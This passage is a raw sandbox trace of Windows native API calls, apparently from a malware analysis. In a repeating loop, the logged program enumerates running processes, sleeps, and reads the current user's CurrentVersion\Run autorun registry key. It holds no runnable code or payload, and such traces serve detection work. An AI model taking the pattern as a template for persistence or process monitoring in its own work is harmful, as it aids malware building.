BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.553] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.556] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.565] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.570] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.571] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.571] NtClose (Handle=0x274) returned 0x0 [0178.571] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.571] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.576] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.586] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.587] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.590] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.592] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.592] NtClose (Handle=0x274) returned 0x0 [0178.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.597] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.605] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.617] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.619] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.619] NtClose (Handle=0x274) returned 0x0 [0178.619] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.619] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.622] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.622] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.622] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.631] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.649] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.650] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.650] NtClose (Handle=0x274) returned 0x0 [0178.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.654] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.662] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.662] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.669] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.670] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.673] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.675] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.675] NtClose (Handle=0x274) returned 0x0 [0178.675] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.675] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.678] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.684] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.688] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.690] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.690] NtClose (Handle=0x274) returned 0x0 [0178.690] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.690] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.693] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.693] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.693] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.700] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.703] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.704] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.704] NtClose (Handle=0x274) returned 0x0 [0178.704] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.704] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.713] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.713] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.721] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.724] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.726] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.726] NtClose (Handle=0x274) returned 0x0 [0178.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.729] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.729] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.734] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.734] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.738] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.740] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.740] NtClose (Handle=0x274) returned 0x0 [0178.740] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.740] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.748] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.750] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.750] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.750] NtClose (Handle=0x274) returned 0x0 [0178.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.750] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.754] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.765] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.766] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.768] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.769] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.769] NtClose (Handle=0x274) returned 0x0 [0178.769] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.769] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.771] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.771] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.775] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.780] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.781] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.781] NtClose (Handle=0x274) returned 0x0 [0178.781] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.781] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 [0178.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0x0 [0178.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0178.789] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0178.790] NtCreateKey (in: KeyHandle=0xdea74, DesiredAccess=0x20219, ObjectAttributes=0xde1e4*(Length=0x18, RootDirectory=0x0, ObjectName="\\Registry\\User\\S-1-5-21-1560258661-3990802383-1811730007-1000\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), TitleIndex=0x0, Class=0x0, CreateOptions=0x0, Disposition=0x0 | out: KeyHandle=0xdea74*=0x274) returned 0x0 [0178.791] NtEnumerateValueKey (in: KeyHandle=0x274, Index=0x0, KeyValueInformationClass=0x1, KeyValueInformation=0xde438, Length=0x200, ResultLength=0xde838 | out: KeyValueInformation=0xde438, ResultLength=0xde838) returned 0x0 [0178.791] NtClose (Handle=0x274) returned 0x0 [0178.791] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1020000, RegionSize=0xdea68*=0x10000) returned 0x0 [0178.791] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1020000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1020000, ResultLength=0x0) returned 0xc0000004 [0178.794] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1020000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0178.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1020000, RegionSize=0xdea54*=0x20000) returned 0x0 